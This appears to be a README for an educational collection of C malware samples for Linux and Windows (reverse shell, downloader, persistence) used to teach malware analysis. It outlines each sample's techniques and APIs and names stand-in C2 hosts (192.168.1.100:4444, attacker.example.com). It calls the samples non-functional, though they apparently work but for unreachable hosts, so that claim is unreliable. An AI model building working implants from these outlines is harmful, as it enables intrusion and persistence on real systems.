Malware Analysis Educational Samples

A collection of educational C samples demonstrating common malware techniques for teaching malware analysis. These samples are non-functional and designed purely for learning malware analysis with Browmal.

Overview

This project contains 6 educational samples (3 for Linux, 3 for Windows) that demonstrate:

1. Reverse Shell - Remote command execution over network
2. Second-Stage Downloader - Multi-stage attack patterns
3. Persistence Mechanisms - Techniques for surviving reboots

Directory Structure

browmal-samples/
├── README.md              # This file
├── BUILD.md              # Detailed build instructions
├── Makefile              # Root Makefile (build both platforms)
├── linux/
│   ├── Makefile          # Linux-specific Makefile
│   ├── sample1_reverse_shell.c
│   ├── sample2_downloader.c
│   ├── sample3_persistence.c
│   └── bin/              # Compiled binaries
└── windows/
    ├── Makefile          # Windows-specific Makefile
    ├── sample1_reverse_shell.c
    ├── sample2_downloader.c
    ├── sample3_persistence.c
    └── bin/              # Compiled binaries

Quick Start

Build Linux Samples (on Linux)

cd browmal-samples
make linux

Build Windows Samples (from Linux, cross-compile)

# Install MinGW first
sudo apt install mingw-w64

# Build
cd browmal-samples
make windows

Build Both

make all

Clean

make clean

Samples Overview

Sample 1: Reverse Shell

Linux: linux/bin/sample1_reverse_shell

• Creates TCP socket
• Connects to C2 server (192.168.1.100:4444)
• Redirects I/O with dup2()
• Spawns /bin/sh for remote command execution

Key IOCs:

• Unexpected socket() calls
• Outbound TCP connections
• Process spawning without user interaction
• I/O redirection

Windows: windows/bin/sample1_reverse_shell.exe

• Initializes Winsock API
• Creates TCP socket
• Uses CreatePipe() for I/O redirection
• Spawns cmd.exe with CREATE_NO_WINDOW
• Demonstrates anonymous pipe usage

Key Windows APIs:

• WSAStartup() / WSACleanup()
• socket() / connect()
• CreatePipe() / CreateProcess()

---

Sample 2: Second-Stage Downloader

Linux: linux/bin/sample2_downloader

• DNS resolution with gethostbyname()
• HTTP socket communication
• File download to /tmp
• File execution with system()
• Cleanup with unlink()

Key IOCs:

• Outbound HTTP/HTTPS to suspicious domains
• Files written to temp directories
• Rapid download → execute pattern
• File permission changes

Windows: windows/bin/sample2_downloader.exe

• WinINet API initialization
• HTTP downloads via InternetOpenUrl()
• Registry checks for antivirus
• ShellExecute() for privilege escalation
• Hidden file attributes

Key Windows APIs:

• InternetOpen() / InternetOpenUrl()
• InternetReadFile()
• RegOpenKey() / RegQueryValue()
• ShellExecute() with "runas" verb
• CreateFile() with FILE_ATTRIBUTE_HIDDEN

---

Sample 3: Persistence Mechanisms

Linux: linux/bin/sample3_persistence

• Copy to system directories (/usr/local/bin)
• Cron job installation
• Startup script modification (~/.bashrc)
• Systemd service explanation
• LD_PRELOAD discussion

Key Techniques:

• Registry Run key persistence
• Startup folder modifications
• Cron job scheduling
• Init script modification
• Service creation

Windows: windows/bin/sample3_persistence.exe

• Registry Run key modification
• Startup folder persistence
• Scheduled task creation
• Windows service explanation
• AppInit_DLLs discussion

Key Windows APIs:

• RegOpenKeyEx() / RegSetValueEx()
• SHGetFolderPath()
• CreateFile() for copying
• Registry key manipulation

Building from Source

See BUILD.md for detailed build instructions including:

• Cross-compilation from Linux to Windows
• Cross-compilation from Windows to Linux
• Compiler options and customization
• Troubleshooting

Running the Samples

All samples are safe to run and will fail gracefully:

# Linux
./linux/bin/sample1_reverse_shell       # Fails connecting to unreachable C2
./linux/bin/sample2_downloader          # Fails DNS resolution
./linux/bin/sample3_persistence         # Demonstrates techniques (fails on permission)

# Windows (on Windows)
sample1_reverse_shell.exe
sample2_downloader.exe
sample3_persistence.exe

Educational Use

These samples are designed for teaching, specifically with Browmal but also:

• Malware analysis courses
• Security engineering training
• Binary analysis workshops
• Reverse engineering practice
• Detection signature development

Important Notes

• These are educational samples only - they are non-functional and designed for learning
• The hardcoded C2 addresses (192.168.1.100:4444, attacker.example.com) are intentionally unreachable
• No actual malicious code should execute
• Files will fail gracefully when running (no network, permission denied, etc.)

Technical Details

Linux Samples

• Architecture: x86-64
• Executable Format: ELF 64-bit
• Dependencies: libc (standard C library)
• Syscalls: socket, connect, fork, execve, system, etc.

Windows Samples

• Architecture: x86-64
• Executable Format: PE32+ (Windows)
• Dependencies: Winsock2, WinINet, Windows API
• APIs: WSA*, InternetOpen*, CreateProcess, Registry functions, etc.

Disclaimer

These samples are designed for:

• Educational purposes
• Security training
• Malware analysis courses
• Authorized security research

They should never be modified to create actual malware. The authors assume no responsibility for misuse. The authors provide no guarantee of safety and hold no liability for any action taken with code or executables from this repository. Portions of this project were created/modified using artificial intelligence.

References

• Malware Analysis: https://www.malware-traffic-analysis.net/
• Reverse Engineering: https://en.wikipedia.org/wiki/Reverse_engineering
• Windows API: https://docs.microsoft.com/en-us/windows/win32/apiindex/windows-api-list
• Linux System Calls: https://man7.org/linux/man-pages/man2/syscalls.2.html

License

Educational use only. Provided as-is for teaching purposes.